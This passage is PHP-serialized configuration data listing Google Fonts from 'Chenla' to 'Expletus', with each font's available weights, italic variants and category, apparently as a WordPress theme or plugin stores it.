Market\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Chenla\";a:3:{s:5:\"label\";s:6:\"Chenla\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Cherish\";a:3:{s:5:\"label\";s:7:\"Cherish\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:17:\"Cherry Cream Soda\";a:3:{s:5:\"label\";s:17:\"Cherry Cream Soda\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Cherry Swash\";a:3:{s:5:\"label\";s:12:\"Cherry Swash\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Chewy\";a:3:{s:5:\"label\";s:5:\"Chewy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Chicle\";a:3:{s:5:\"label\";s:6:\"Chicle\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Chilanka\";a:3:{s:5:\"label\";s:8:\"Chilanka\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Chivo\";a:3:{s:5:\"label\";s:5:\"Chivo\";s:8:\"variants\";a:8:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:3:\"900\";i:5;s:9:\"900italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Chonburi\";a:3:{s:5:\"label\";s:8:\"Chonburi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Cinzel\";a:3:{s:5:\"label\";s:6:\"Cinzel\";s:8:\"variants\";a:6:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Cinzel Decorative\";a:3:{s:5:\"label\";s:17:\"Cinzel Decorative\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:3:\"900\";i:2;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Clicker Script\";a:3:{s:5:\"label\";s:14:\"Clicker Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:4:\"Coda\";a:3:{s:5:\"label\";s:4:\"Coda\";s:8:\"variants\";a:2:{i:0;s:3:\"800\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Coda Caption\";a:3:{s:5:\"label\";s:12:\"Coda Caption\";s:8:\"variants\";a:1:{i:0;s:3:\"800\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Codystar\";a:3:{s:5:\"label\";s:8:\"Codystar\";s:8:\"variants\";a:2:{i:0;s:3:\"300\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Coiny\";a:3:{s:5:\"label\";s:5:\"Coiny\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Combo\";a:3:{s:5:\"label\";s:5:\"Combo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Comfortaa\";a:3:{s:5:\"label\";s:9:\"Comfortaa\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Comforter\";a:3:{s:5:\"label\";s:9:\"Comforter\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:15:\"Comforter Brush\";a:3:{s:5:\"label\";s:15:\"Comforter Brush\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Comic Neue\";a:3:{s:5:\"label\";s:10:\"Comic Neue\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:11:\"Coming Soon\";a:3:{s:5:\"label\";s:11:\"Coming Soon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Commissioner\";a:3:{s:5:\"label\";s:12:\"Commissioner\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Concert One\";a:3:{s:5:\"label\";s:11:\"Concert One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Condiment\";a:3:{s:5:\"label\";s:9:\"Condiment\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Content\";a:3:{s:5:\"label\";s:7:\"Content\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Contrail One\";a:3:{s:5:\"label\";s:12:\"Contrail One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Convergence\";a:3:{s:5:\"label\";s:11:\"Convergence\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Cookie\";a:3:{s:5:\"label\";s:6:\"Cookie\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Copse\";a:3:{s:5:\"label\";s:5:\"Copse\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Corben\";a:3:{s:5:\"label\";s:6:\"Corben\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Corinthia\";a:3:{s:5:\"label\";s:9:\"Corinthia\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Cormorant\";a:3:{s:5:\"label\";s:9:\"Cormorant\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Cormorant Garamond\";a:3:{s:5:\"label\";s:18:\"Cormorant Garamond\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Cormorant Infant\";a:3:{s:5:\"label\";s:16:\"Cormorant Infant\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Cormorant SC\";a:3:{s:5:\"label\";s:12:\"Cormorant SC\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Cormorant Unicase\";a:3:{s:5:\"label\";s:17:\"Cormorant Unicase\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Cormorant Upright\";a:3:{s:5:\"label\";s:17:\"Cormorant Upright\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Courgette\";a:3:{s:5:\"label\";s:9:\"Courgette\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Courier Prime\";a:3:{s:5:\"label\";s:13:\"Courier Prime\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:7:\"Cousine\";a:3:{s:5:\"label\";s:7:\"Cousine\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:8:\"Coustard\";a:3:{s:5:\"label\";s:8:\"Coustard\";s:8:\"variants\";a:2:{i:0;s:3:\"900\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:21:\"Covered By Your Grace\";a:3:{s:5:\"label\";s:21:\"Covered By Your Grace\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Crafty Girls\";a:3:{s:5:\"label\";s:12:\"Crafty Girls\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Creepster\";a:3:{s:5:\"label\";s:9:\"Creepster\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Crete Round\";a:3:{s:5:\"label\";s:11:\"Crete Round\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Crimson Pro\";a:3:{s:5:\"label\";s:11:\"Crimson Pro\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Croissant One\";a:3:{s:5:\"label\";s:13:\"Croissant One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Crushed\";a:3:{s:5:\"label\";s:7:\"Crushed\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Cuprum\";a:3:{s:5:\"label\";s:6:\"Cuprum\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Cute Font\";a:3:{s:5:\"label\";s:9:\"Cute Font\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Cutive\";a:3:{s:5:\"label\";s:6:\"Cutive\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Cutive Mono\";a:3:{s:5:\"label\";s:11:\"Cutive Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:7:\"DM Mono\";a:3:{s:5:\"label\";s:7:\"DM Mono\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:7:\"DM Sans\";a:3:{s:5:\"label\";s:7:\"DM Sans\";s:8:\"variants\";a:6:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"DM Serif Display\";a:3:{s:5:\"label\";s:16:\"DM Serif Display\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"DM Serif Text\";a:3:{s:5:\"label\";s:13:\"DM Serif Text\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Damion\";a:3:{s:5:\"label\";s:6:\"Damion\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:14:\"Dancing Script\";a:3:{s:5:\"label\";s:14:\"Dancing Script\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Dangrek\";a:3:{s:5:\"label\";s:7:\"Dangrek\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Darker Grotesque\";a:3:{s:5:\"label\";s:16:\"Darker Grotesque\";s:8:\"variants\";a:7:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"David Libre\";a:3:{s:5:\"label\";s:11:\"David Libre\";s:8:\"variants\";a:3:{i:0;s:3:\"500\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:20:\"Dawning of a New Day\";a:3:{s:5:\"label\";s:20:\"Dawning of a New Day\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Days One\";a:3:{s:5:\"label\";s:8:\"Days One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Dekko\";a:3:{s:5:\"label\";s:5:\"Dekko\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:15:\"Dela Gothic One\";a:3:{s:5:\"label\";s:15:\"Dela Gothic One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Delius\";a:3:{s:5:\"label\";s:6:\"Delius\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:17:\"Delius Swash Caps\";a:3:{s:5:\"label\";s:17:\"Delius Swash Caps\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:14:\"Delius Unicase\";a:3:{s:5:\"label\";s:14:\"Delius Unicase\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Della Respira\";a:3:{s:5:\"label\";s:13:\"Della Respira\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Denk One\";a:3:{s:5:\"label\";s:8:\"Denk One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Devonshire\";a:3:{s:5:\"label\";s:10:\"Devonshire\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Dhurjati\";a:3:{s:5:\"label\";s:8:\"Dhurjati\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Didact Gothic\";a:3:{s:5:\"label\";s:13:\"Didact Gothic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Diplomata\";a:3:{s:5:\"label\";s:9:\"Diplomata\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Diplomata SC\";a:3:{s:5:\"label\";s:12:\"Diplomata SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Do Hyeon\";a:3:{s:5:\"label\";s:8:\"Do Hyeon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Dokdo\";a:3:{s:5:\"label\";s:5:\"Dokdo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Domine\";a:3:{s:5:\"label\";s:6:\"Domine\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Donegal One\";a:3:{s:5:\"label\";s:11:\"Donegal One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Dongle\";a:3:{s:5:\"label\";s:6:\"Dongle\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Doppio One\";a:3:{s:5:\"label\";s:10:\"Doppio One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Dorsa\";a:3:{s:5:\"label\";s:5:\"Dorsa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Dosis\";a:3:{s:5:\"label\";s:5:\"Dosis\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"DotGothic16\";a:3:{s:5:\"label\";s:11:\"DotGothic16\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Dr Sugiyama\";a:3:{s:5:\"label\";s:11:\"Dr Sugiyama\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Duru Sans\";a:3:{s:5:\"label\";s:9:\"Duru Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Dynalight\";a:3:{s:5:\"label\";s:9:\"Dynalight\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"EB Garamond\";a:3:{s:5:\"label\";s:11:\"EB Garamond\";s:8:\"variants\";a:10:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Eagle Lake\";a:3:{s:5:\"label\";s:10:\"Eagle Lake\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:14:\"East Sea Dokdo\";a:3:{s:5:\"label\";s:14:\"East Sea Dokdo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Eater\";a:3:{s:5:\"label\";s:5:\"Eater\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Economica\";a:3:{s:5:\"label\";s:9:\"Economica\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Eczar\";a:3:{s:5:\"label\";s:5:\"Eczar\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"El Messiri\";a:3:{s:5:\"label\";s:10:\"El Messiri\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Electrolize\";a:3:{s:5:\"label\";s:11:\"Electrolize\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Elsie\";a:3:{s:5:\"label\";s:5:\"Elsie\";s:8:\"variants\";a:2:{i:0;s:3:\"900\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Elsie Swash Caps\";a:3:{s:5:\"label\";s:16:\"Elsie Swash Caps\";s:8:\"variants\";a:2:{i:0;s:3:\"900\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Emblema One\";a:3:{s:5:\"label\";s:11:\"Emblema One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Emilys Candy\";a:3:{s:5:\"label\";s:12:\"Emilys Candy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Encode Sans\";a:3:{s:5:\"label\";s:11:\"Encode Sans\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Encode Sans Condensed\";a:3:{s:5:\"label\";s:21:\"Encode Sans Condensed\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Encode Sans Expanded\";a:3:{s:5:\"label\";s:20:\"Encode Sans Expanded\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Encode Sans SC\";a:3:{s:5:\"label\";s:14:\"Encode Sans SC\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:26:\"Encode Sans Semi Condensed\";a:3:{s:5:\"label\";s:26:\"Encode Sans Semi Condensed\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:25:\"Encode Sans Semi Expanded\";a:3:{s:5:\"label\";s:25:\"Encode Sans Semi Expanded\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Engagement\";a:3:{s:5:\"label\";s:10:\"Engagement\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Englebert\";a:3:{s:5:\"label\";s:9:\"Englebert\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Enriqueta\";a:3:{s:5:\"label\";s:9:\"Enriqueta\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Ephesis\";a:3:{s:5:\"label\";s:7:\"Ephesis\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Epilogue\";a:3:{s:5:\"label\";s:8:\"Epilogue\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Erica One\";a:3:{s:5:\"label\";s:9:\"Erica One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Esteban\";a:3:{s:5:\"label\";s:7:\"Esteban\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Estonia\";a:3:{s:5:\"label\";s:7:\"Estonia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:15:\"Euphoria Script\";a:3:{s:5:\"label\";s:15:\"Euphoria Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Ewert\";a:3:{s:5:\"label\";s:5:\"Ewert\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:3:\"Exo\";a:3:{s:5:\"label\";s:3:\"Exo\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Exo 2\";a:3:{s:5:\"label\";s:5:\"Exo 2\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Expletus Sans\";a:3:{s:5:\"label\";s:13:\"Expletus 